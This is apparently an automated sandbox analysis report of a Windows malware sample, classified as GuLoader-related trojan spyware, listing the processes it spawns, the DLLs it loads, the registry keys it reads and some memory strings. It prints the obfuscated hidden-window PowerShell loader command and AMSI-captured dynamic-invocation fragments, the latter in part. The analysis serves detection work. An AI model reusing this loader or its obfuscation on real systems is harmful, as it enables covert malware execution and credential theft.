Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: String function: 1F79B970 appears 275 times
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: String function: 1F7E5130 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: String function: 1F7F7E54 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: String function: 1F82F290 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: String function: 1F81EA12 appears 86 times

Source: Forhandlingsfriheden.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/14@2/3

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

0_2_0040351C

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049B1

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Code function: 0_2_004021CF CoCreateInstance,

0_2_004021CF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2532:120:WilError_03

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

File created: C:\Users\user\AppData\Local\Temp\nspF7FB.tmp

Source: Forhandlingsfriheden.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: svchost.exe, 00000009.00000003.3217305279.0000000003070000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3217419528.0000000003073000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3219469350.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3360182038.0000000003073000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3360608620.00000000030CE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

File read: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Source: unknown	Process created: C:\Users\user\Desktop\Forhandlingsfriheden.exe "C:\Users\user\Desktop\Forhandlingsfriheden.exe"
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Found suspicious powershell code related to unpacking or dynamic code loading

Source: Forhandlingsfriheden.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: CallSite.Targetore.pdbs source: powershell.exe, 00000002.00000002.2794477893.0000000000638000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PxuyeSuijNdsM.exe, 00000008.00000002.3359525503.000000000038E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Opfattelsers.exe, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: svchost.pdb source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.3027521068.0000000002BA4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2803507760.000000000A274000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sikkerheder $Latterliggrelsen $Jerseykvg), (Udskilt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Peddle = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Verdenskrig)), $hibernated).DefineDynamicModule($huntsman, $false).DefineType($Scleronychia, $Subscale, [System.MulticastDelegate])$Sy

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)
Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_06FE0FC4 push es; iretd	2_2_06FE0FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D35C98 push ds; retf	2_2_08D35C99
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D33EB3 push ebp; retf	2_2_08D33EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D34078 push 00000046h; retf	2_2_08D3407A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D30631 push cs; iretd	2_2_08D30682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D33822 push 0000007Eh; ret	2_2_08D3386F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D337C0 push 0000007Eh; ret	2_2_08D3386F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D351F0 push FFFFFFCDh; iretd	2_2_08D35205
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D3239C push esi; ret	2_2_08D323A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D35DBB push FFFFFFAAh; ret	2_2_08D35DC6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D30FBC push esp; iretd	2_2_08D30FC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D35F7A push ebp; iretd	2_2_08D35F85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D31510 push ss; retf	2_2_08D31515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D33D21 push esp; retf	2_2_08D33D24
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D31329 push ebp; ret	2_2_08D31330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08D32B2C push edx; ret	2_2_08D32B32
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A09AD push ecx; mov dword ptr [esp], ecx	6_2_1F7A09B6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_016651F0 push FFFFFFCDh; iretd	6_2_01665205
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01664078 push 00000046h; retf	6_2_0166407A
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01661329 push ebp; ret	6_2_01661330
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_0166239C push esi; ret	6_2_016623A1
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01661510 push ss; retf	6_2_01661515
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_016637C0 push 0000007Eh; ret	6_2_0166386F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01660631 push cs; iretd	6_2_01660682
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01663822 push 0000007Eh; ret	6_2_0166386F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01662B2C push edx; ret	6_2_01662B32
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01663D21 push esp; retf	6_2_01663D24
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01665DBB push FFFFFFAAh; ret	6_2_01665DC6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01665C98 push ds; retf	6_2_01665C99
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01665F7A push ebp; iretd	6_2_01665F85
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_01660FBC push esp; iretd	6_2_01660FC9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
